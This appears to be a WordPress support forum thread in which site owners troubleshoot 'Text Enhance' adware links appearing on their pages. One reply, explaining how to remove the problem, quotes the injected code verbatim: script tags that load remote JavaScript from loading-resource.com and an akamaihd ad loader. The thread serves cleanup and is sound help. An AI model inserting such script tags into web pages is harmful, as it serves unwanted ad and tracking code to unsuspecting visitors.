• Resolved sasksupport


    One of my sites recently developed a Text Enhance Link on one header only.

    There is no code in the POST calling it,
    it happens in IE and Chrome but not Firefox
    IE and Chrome have NO extensions or add ins loaded

    I searched everywhere, and all support seemed to link it to an Extension or Add in, well I couldn’t find anything,

    so what I did,
    I deleted the post and created a new one, same content, same title, the Text enhance link showed again.

    I changed the TITLE OF THE POST the link went away, I re did the title the link came back.

    So, I still don’t know where it’s coming from, but it seems to be looking for certain phrases or keywords to attach itself too.

    the Phrase I was using was “Lets Get Started” I changed it to Get Started and the link is gone,,,,,

    if anyone knows more about this I’d love to know where it’s coming from.

    Yes I know it’s FLASH related, if I disable Flash of course it goes away, but that’s not a solution ??

    https://www.reginacustombookkeeping.com is the site,

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  • This is a browser issue – not a WordPress one.

    I am having a problem with Text-Enhance Links. I have been searching all afternoon looking for a solution.

    I only have the problem on https://fortressoffaith.org/daily-programs

    I have followed all of the instructions on clearing my browsers of guilty plugins and addons. I use FF.

    The problem is showing up on my laptop, a brand new laptop of my son-in-law’s clear across the country, my daughter’s laptop, my Linux box, my son’s computer, and my son-in-law’s computer here at home. We all use FF, but it is also showing up in Chrome and IE.

    It seems highly unlikely that all of these browsers on all of these different computers would have been infected at the same time.

    I read a dispute on this forum between two arguing about whether or not it is an infestation of WP or a browser problem. Elsewhere I have read that there seems to be some reports of infestation.

    Is it possible that both could be true?

    I have disabled all of the plugins and addons in FF and removed all of them that I saw no need for and the problem persists.

    I have used Quttera Web Malware Scanner to scan the blog and it found no problems.

    Can someone please give me some ideas of what else to do?


    it would really help if you start your own topic.

    Hey Guys.. I spent a few days driving myself crazy over Text enhance on my WP sites… Until I stopped thinking it was a major problem and started thinking smaller. For me it was two plugins, BlackStudio Tiny MCE and Testimonials plugin… Here’s what you do…

    Deactivate all of your plugins. One by one, turn them on and refresh your site until you see the ads popup again.. now you have isolated the plugin.

    Check each page to see if the code is there. You may still find it on a few pages, however, when you go to ‘edit’ that particular page, the code you are looking for will now be visible in the html editor. (Typically at the bottom.) Simply delete the script and update the page…. Boom! All gone!

    This is the code that was on my site:

    <script type=”text/javascript” src=”//loading-resource.com/data.geo.php?callback=window.__geo.getData”></script><script type=”text/javascript” src=”https://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862″></script&gt;

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